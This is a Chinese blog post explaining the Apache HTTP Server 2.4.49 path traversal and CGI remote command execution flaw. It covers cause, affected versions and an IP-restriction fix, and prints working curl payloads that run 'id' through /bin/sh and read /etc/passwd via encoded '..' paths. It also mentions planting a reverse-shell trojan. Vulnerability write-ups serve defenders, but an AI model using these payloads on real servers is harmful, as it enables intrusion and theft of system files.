Apache HTTP Server 2.4.49 路径穿越,远程命令执行漏洞

最新推荐文章于 2023-09-07 22:26:34 发布
最新推荐文章于 2023-09-07 22:26:34 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: 安全 文章标签: apache http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/120858733
版权

文章目录

项目场景:

Apache HTTP Server 2.4.49,2.5.0

问题描述:

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

原因分析:

远程命令执行
在httpd.conf的文件中的这俩配置,导致任意请求都能访问根目录,和cgi-bin目录。
CGI是一段程序,它运行在Server上,提供同客户端 Html页面的接口。如果它能目录穿越了,我们就可以到bin目录下的sh文件/bash文件(系统命令执行文件)里面去执行脚本,而脚本内容就是我们用POST传进去的内容。就相当危险了。

在这里插入图片描述
在这里插入图片描述
payload:curl -X POST -d “echo;id” http://ip:port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
或者利用bash命令写入一个木马回弹shell。
目录穿越
对于没有进行安全配置的Apache服务器,默认情况可以用xxx.com/icons/的方式打开Apache目录下的icons文件夹,并且会罗列出文件列表,这样很不安全。
在/apache2/conf/extra目录下,配置了icons的权限。也是允许所有进行访问,并且当用户访问该目录时,如果用户找不到DirectoryIndex指定的主页文件(例如index.html),则返回该目录下的文件列表给用户。
在这里插入图片描述
就导致了,直接访问icons会显示该目录底下的文件。

例如:命令curl http://xxxxx:xxxx/icons/
在这里插入图片描述
payload:curl http://ip:port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

解决方案:

在配置文件中指定可以访问目录的ip,并且指定访问CGI的ip。

熊是本熊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache 2.4.49 路径穿越漏洞复现 ( CVE-2021-41773 )
qq_45396375的博客
01-04 566
Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞(CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 3920
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
Apache HTTP Server 2.4.49 路径穿越命令执行漏洞(CVE-2021-41773)
weixin_44047654的博客
12-07 392
Apache HTTP Server 2.4.49 路径穿越命令执行漏洞(CVE-2021-41773)
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3106
ApacheHTTPServerApache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgicgid的服务器上执行任意命令。.....................
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)
weixin_47311099的博客
12-07 1965
Apache HTTP Server 2.4.49 路径穿越漏洞复现(CVE-2021-41773) Apache HTTP ServerApache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
apache 2.4.x http server x64.zip 下载
03-12
VisualSVN Server 添加自助修改密码页面所需的文件,解压后,从里面提取一个文件 htpasswd.exe 放到:C:\Program Files\VisualSVN Server\bin\htpasswd.exe
Apache HttpServer 2.4.X 和tomcat连接器
05-07
通过这种方式,Apache HttpServer 2.4.X 和 Tomcat 连接器可以构建出一个强大的Web服务器环境,兼顾静态内容的快速服务和动态应用的高效执行。这种架构在大型网站和企业级应用中尤为常见,因为它既保留了Apache的...
apache-httpd-2.4.58-win64-VS17.zip
最新发布
12-15
标题 "apache-httpd-2.4.58-win64-VS17.zip" 指的是 Apache HTTP 服务器的2.4.58版本,适用于64位Windows操作系统,并且是使用Visual Studio 2017编译的。这个压缩包包含了一系列用于在Windows平台上搭建和运行...
httpd-2.4.49-o111l-x64-vc15.zip
11-23
这个名为“httpd-2.4.49-o111l-x64-vc15.zip”的压缩包文件,是专为Windows操作系统设计的64位版本,基于Apache 2.4.49稳定版,并使用Visual C++ 15编译器(即Visual Studio 2017)编译。此版本添加了O111L扩展,...
centos7最新Apache 2.4.48 RPM包
09-03
最新Apache 2.4.48 RPM包,包含依赖,主要支持centos 7系列,已在 centos7.6 centos7.9验证有效,使用命令下面的命令进行安装: rpm -Uvh *.rpm --nodeps --force
Apache HTTP Server 2.4.50路径穿越以及远程代码执行(CVE-2021-42103)
m0_58596609的博客
12-28 704
Apache HTTP Server 2.4.50路径穿越以及远程代码执行(CVE-2021-42103)
Apache http Server 2.4 安装与配置
weixin_34413802的博客
11-16 193
前言 Apache官网从2.2之后,不再提供windows的msi或exe安装版本,现在Apache http Server有两个分支2.2及2.4 注意事项 如果之前有安装2.2的版本,请先卸载 Apache2.4下载 1、进入apache官网:https://httpd.apache.org/download.cgi 2、选择2.4的版本,点击 Files for Micros...
apache-httpd_2.4.49_path-traversal_CVE-2021-41773
acdcccc的博客
09-07 163
Apache httpd 2.4.49 路径穿越漏洞
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 3558
一、漏洞描述 Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
CVE-2021-42013 Apache路径穿越&命令执行漏洞复现
afei001
10-10 2370
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.3 CVE-2021-42013 POC 5.修复建议 1.漏洞概述 CVE-2021-42013是由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。 2.影响版本 仅影响...
CVE-2021-41773 Apache2.4.49路径穿越漏洞复现
Vitaminapple的博客
10-09 2293
CVE-2021-41773 Apache2.4.49路径穿越漏洞复现 1. 环境搭建 (1) 下载Apache2.4.49版本镜像 $ docker pull httpd:2.4.49 查看镜像是否正确下载 $ docker images (2)启动镜像 $ docker run -d -P 391841fe5284 查看启动镜像的容器,可查看映射的端口和容器ID $ docker ps (3)进入容器 $ docker exec -it 605eb3979ca0 /bin/bash 修改http
中间件漏洞 | Apache-路径穿越/任意命令执行
weixin_52116519的博客
11-02 1384
Apache HTTP Server 2.4.49 路径穿越漏洞Apache HTTP ServerApache基金会开源的一款流行的HTTP服务器。在其2.4.49版本版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgicgid的服务器上执行任意命令
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
weixin_64655821的博客
10-13 1983
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
apache 2.4.56以及2.4.57版本
05-10
- CVE-2021-41773:Apache HTTP Server 2.4.492.4.50中存在的目录遍历漏洞。 - CVE-2021-42013:Apache HTTP Server 2.4.492.4.51中存在的身份验证绕过漏洞。 而2.4.57版本则是对2.4.56版本的补丁版本,主要是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值